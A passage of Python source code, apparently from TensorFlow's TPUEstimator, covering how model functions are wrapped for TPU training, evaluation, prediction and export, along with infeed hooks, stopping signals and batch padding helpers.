else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
tensors_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
tensors = nest.flatten(tensors_dict)
tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)]
# We cannot return anything other than `tpu_tensors` here so we capture
# the rest for later use.
capture.capture((estimator_spec, tensors_dict, tensors))
return tpu_tensors
tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation)
estimator_spec, tensors_dict, tensors = capture.get()
# Reconstruct `tensors`, but with `tpu_tensors` replaced with
# `tpu_tensors_on_cpu`.
new_tensors = []
for t in tensors:
if _is_tpu_tensor(t):
new_tensors.append(tpu_tensors_on_cpu.pop(0))
elif t is None:
new_tensors.append(None)
else:
# Fetching `t` alone does not trigger the TPU computation and would
# block, so we add the control dependency on `tpu_tensors_on_cpu` here.
control_inputs = (
tpu_tensors_on_cpu if isinstance(tpu_tensors_on_cpu,
(list, tuple)) else
(tpu_tensors_on_cpu,))
with ops.control_dependencies(control_inputs):
new_tensors.append(array_ops.identity(t))
# Reconstruct `tensors_dict`.
new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors)
# Reconstruct `export_outputs`.
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_tensors_dict))
return estimator_spec._replace(export_outputs=new_export_outputs)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Set the batch size in params first. This helps the user have the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing warning
message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if self._log_every_n_steps is not None:
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
output_dir=self.model_dir,
every_n_steps=self._log_every_n_steps)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if self._log_every_n_steps is not None:
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'shutdown_worker')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(timeout_ms=60 * 1000),
]
elif shutdown_mode == 'shutdown_computation':
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60 * 1000),
]
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
),
InstallSignalHandlerHook()
])
if self._log_every_n_steps is not None:
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.append(
training.LoggingTensorHook({
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency))
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold, eval_hooks = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After the TPU evaluation computation is done (the mean_loss tensor),
# read all variables back from the TPU and update the eval step
# counter properly.
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` to have an update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separate thread. So, here we give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies so that
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode]),
] + input_hooks
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(dummy_predict_op, host_calls,
scaffold, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the elements (via a generator) to the call site. So,
# the outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue where we might
# trigger multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode]),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _is_tpu_tensor(tensor):
if not isinstance(tensor, ops.Tensor):
return False
try:
tensor.op.get_attr(tpu._OUTSIDE_COMPILATION_ATTR) # pylint: disable=protected-access
except ValueError:
return True
else:
return False
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output.outputs.values()
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold, captured_eval_hooks.get()
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold, captured_training_hooks.get()
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold, captured_predict_hooks.get()
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only once. Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file a bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'a bug.')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = self._dataset.make_initializable_iterator()
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is now a dictionary and `features`, `labels`, and `signals` are three
distinct keys in that dict. This provides a better structure, which eases
the process of decomposing the inputs (see `features_and_labels`).
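For illustration only (the exact keys come from `_StopSignals.as_dict`), an
element that used to be `(features, labels)` becomes roughly:
{'features': features, 'labels': labels,
'signals': {'stopping': <[batch_size, 1] bool Tensor>}}
with an additional 'padding_mask' entry in 'signals' when add_padding=True.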
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For the non-Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
